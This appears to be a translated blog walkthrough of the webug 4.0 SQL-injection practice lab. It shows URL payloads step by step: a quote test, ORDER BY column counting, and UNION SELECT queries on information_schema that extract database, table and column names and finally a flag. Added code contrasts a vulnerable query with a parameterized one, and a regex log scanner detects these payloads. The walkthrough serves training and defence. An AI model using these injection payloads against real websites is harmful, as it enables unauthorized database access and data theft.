webug4.0 display-error injection - 1

Some background

  1. concat(str1, str2, ...) joins its parameters into one string with no separator; if any parameter is NULL, the result is NULL.
  2. concat_ws(separator, str1, str2, ...) joins the strings with the given separator; the first parameter is the separator.
  3. group_concat(str1, str2, ...) joins the values from all rows of a group into one string, separated by commas by default.
  4. union merges the result sets of two or more select statements; every select inside the union must return the same number of columns, and the data types of the columns should match.
  5. General injection workflow: input point -> database -> table -> column -> data item

Enter the shooting range

Look at the interface:
ip: 192.168.177.130/control/sqlinject/manifest_error.php?id=1

Try id=1, id=2 and id=3 as shown above.
id=2:

id=3:

By comparing them we can guess:

The backend takes the id from the page, looks it up in the database and outputs the result; if there is no result, the corresponding position on the page stays empty, as with id=3.

Looking for the injection point

Display-error injection; with id=3, guess the backend SQL statement is:

select * from table where id = $id + (something may follow, such as a limit or a nested query, so the usual practice is to append a comment symbol after the injected part to neutralize whatever follows)

Then try single quotes, double quotes, parentheses and their combinations one by one:

url?id=1' gives an error:
Invalid query: SELECT * FROM sqlinjection WHERE id = '1''

Injection point found. Next determine the number of columns with order by, which makes the union query easier:
http://localhost/control/sqlinject/manifest_error.php?id=1' order by 1%23

Trying from 1 upward, order by 3 errors out, so the number of columns is 2 (the writeups by the big shots online use binary search, which is much faster when there are many columns; I'm really too much of a noob, wuwuwu)

Let's see which column displays the data we want:
payload: id=3' union select 1,2%23

It is in the second column. That is all for this part; next we can use this injection point to get the information we want.
We do this step because the column names in a UNION result set are always those of the first SELECT statement in the UNION, and the backend outputs the one column it found, as shown in the figure.
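To make the behaviour above concrete, here is an added example (not code from the webug project or from this writeup) that rebuilds the guessed backend query against an in-memory SQLite database. The table, rows and flag value are constructed stand-ins, and the comment marker is SQLite's `--` instead of MySQL's `#` (%23) so it runs offline. It shows the three outcomes the walkthrough relies on (a stray quote breaks the statement, a UNION or ORDER BY with the wrong column count errors out, a UNION with the right count lands in the displayed column) and that the same inputs are inert once the id is bound as a parameter.

```python
import sqlite3

# Constructed in-memory stand-in for the page's "sqlinjection" table and the
# "flag" table (assumption: the real webug 4.0 schema is not shown on the page).
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE sqlinjection (id INTEGER, title TEXT)")
    con.executemany("INSERT INTO sqlinjection VALUES (?, ?)",
                    [(1, "first article"), (2, "second article")])
    con.execute("CREATE TABLE flag (id INTEGER, flag TEXT)")
    con.execute("INSERT INTO flag VALUES (1, 'flag{constructed_sample}')")
    return con


def lookup_vulnerable(con: sqlite3.Connection, user_id: str) -> list:
    """Mirrors the guessed backend: the id is pasted straight into the SQL text,
    so quotes and keywords inside it become part of the statement."""
    sql = f"SELECT * FROM sqlinjection WHERE id = '{user_id}'"
    return con.execute(sql).fetchall()


def lookup_parameterized(con: sqlite3.Connection, user_id: str) -> list:
    """Hardened form: the id travels as a bound parameter, never as SQL text."""
    return con.execute("SELECT * FROM sqlinjection WHERE id = ?", (user_id,)).fetchall()


def probe(query_fn, con: sqlite3.Connection, user_id: str) -> tuple:
    """Run one lookup and report ("rows", <rows>) or ("error", <exception class>),
    the two outcomes the walkthrough distinguishes (page output vs. SQL error)."""
    try:
        return ("rows", query_fn(con, user_id))
    except sqlite3.Error as exc:
        return ("error", type(exc).__name__)


# The inputs from the walkthrough, with SQLite's "--" in place of MySQL's "#".
PROBES = [
    "1",                                   # normal lookup
    "1'",                                  # stray quote -> syntax error
    "1' ORDER BY 2--",                     # column-count probe that fits
    "1' ORDER BY 3--",                     # one past the real column count -> error
    "3' UNION SELECT 1--",                 # wrong UNION column count -> error
    "3' UNION SELECT 1,2--",               # right count: the marker 2 is displayed
    "3' UNION SELECT 1,flag FROM flag--",  # second column now carries table data
]


def compare_all(con: sqlite3.Connection) -> dict:
    """Outcome of every probe under both query styles, keyed by the raw input."""
    return {p: {"vulnerable": probe(lookup_vulnerable, con, p),
                "parameterized": probe(lookup_parameterized, con, p)}
            for p in PROBES}


if __name__ == "__main__":
    for raw, outcome in compare_all(make_db()).items():
        print(f"{raw!r:40} vulnerable={outcome['vulnerable']}  "
              f"parameterized={outcome['parameterized']}")
```

The parameterized version returns an empty result for every injected string because the database compares the whole string against the integer id column; nothing in the input is ever parsed as SQL, which is the fix the rest of this writeup is implicitly relying on being absent.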

For example, query the user name: id=3%27%20union%20select%201,user()%23

Getting the flag

1. Query the MySQL version
payload: id=3' union select 1,version() %23

If the version is greater than 15, MySQL has the information_schema database, through which we can obtain the names of every database in MySQL together with their tables and columns.

2. Confirm which databases exist in MySQL

The page displays only one field, while the query will certainly return several databases, so here we need the GROUP_CONCAT function to combine multiple values into one.

payload:
id=3' UNION SELECT 1,GROUP_CONCAT(schema_name) FROM information_schema.SCHEMATA %23

Look at the current database
payload: id=3' UNION SELECT 1,database()%23

First check which tables there are

payload:
id=3' UNION SELECT 1,GROUP_CONCAT(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA =%20 'webug'%23

Hahaha, there is a flag table

Confirm the table's columns

payload:
id=3' UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='flag'%23

Let's take a look

payload: id=3' UNION SELECT 1,id from webug.flag%23

payload: id=3' UNION SELECT 1,flag from webug.flag%23

We get the flag; open the shooting range, submit it, and it reports the flag as correct.
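From the defender's side, the same payloads leave a recognisable trail in the web server's access log. The following is an added example, not part of the original writeup: it parses a handful of constructed access-log lines (the path and client address mimic the lab URL above; timestamps, status codes and sizes are made up), URL-decodes each query parameter and flags the patterns this walkthrough uses (UNION ... SELECT, numeric ORDER BY probing, information_schema lookups, and a quote followed by a comment marker). The rule names and the log layout are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in a common access-log layout (not taken from the page;
# the path and client address mimic the lab URL, everything else is made up).
SAMPLE_LOG = """\
192.168.177.1 - - [10/Feb/2020:10:00:01 +0800] "GET /control/sqlinject/manifest_error.php?id=1 HTTP/1.1" 200 512
192.168.177.1 - - [10/Feb/2020:10:00:05 +0800] "GET /control/sqlinject/manifest_error.php?id=1' HTTP/1.1" 500 88
192.168.177.1 - - [10/Feb/2020:10:00:09 +0800] "GET /control/sqlinject/manifest_error.php?id=1'%20order%20by%203%23 HTTP/1.1" 500 88
192.168.177.1 - - [10/Feb/2020:10:00:12 +0800] "GET /control/sqlinject/manifest_error.php?id=3%27%20union%20select%201,version()%23 HTTP/1.1" 200 540
192.168.177.1 - - [10/Feb/2020:10:00:20 +0800] "GET /control/sqlinject/manifest_error.php?id=3'%20UNION%20SELECT%201,GROUP_CONCAT(schema_name)%20FROM%20information_schema.SCHEMATA%20%23 HTTP/1.1" 200 700
192.168.177.1 - - [10/Feb/2020:10:01:00 +0800] "GET /index.php?page=union%20station HTTP/1.1" 200 300
"""

# Pulls the request line out of one log entry: method, target, protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Rule names are assumptions; each pattern runs over the URL-decoded parameter value,
# so percent-encoded spaces and "%23" (#) no longer hide the keywords.
RULES = [
    ("union_select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
    ("quote_then_comment", re.compile(r"'[^']*?(?:#|--|/\*)")),
]


def decoded_params(target: str) -> list:
    """Split the request target into (name, decoded value) pairs."""
    query = urlsplit(target).query
    return parse_qsl(query, keep_blank_values=True)


def scan(log_text: str) -> list:
    """Return one finding per parameter value that trips at least one rule."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue  # malformed or non-request line; nothing to inspect
        for name, value in decoded_params(m.group("target")):
            hit = [rule for rule, pattern in RULES if pattern.search(value)]
            if hit:
                findings.append({"line": line_no, "param": name,
                                 "value": value, "rules": hit})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']}: {f['param']}={f['value']!r} -> {', '.join(f['rules'])}")
```

The lone quote on the second line is deliberately not flagged on its own (too noisy in real traffic), but note that it is the request that produced the 500; correlating error status codes with a following ORDER BY or UNION sequence from the same client is the stronger signal. The last line shows why decoding and requiring both keywords matters: "union station" is ordinary text.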

Origin www.cnblogs.com/pikachuu/p/12349732.html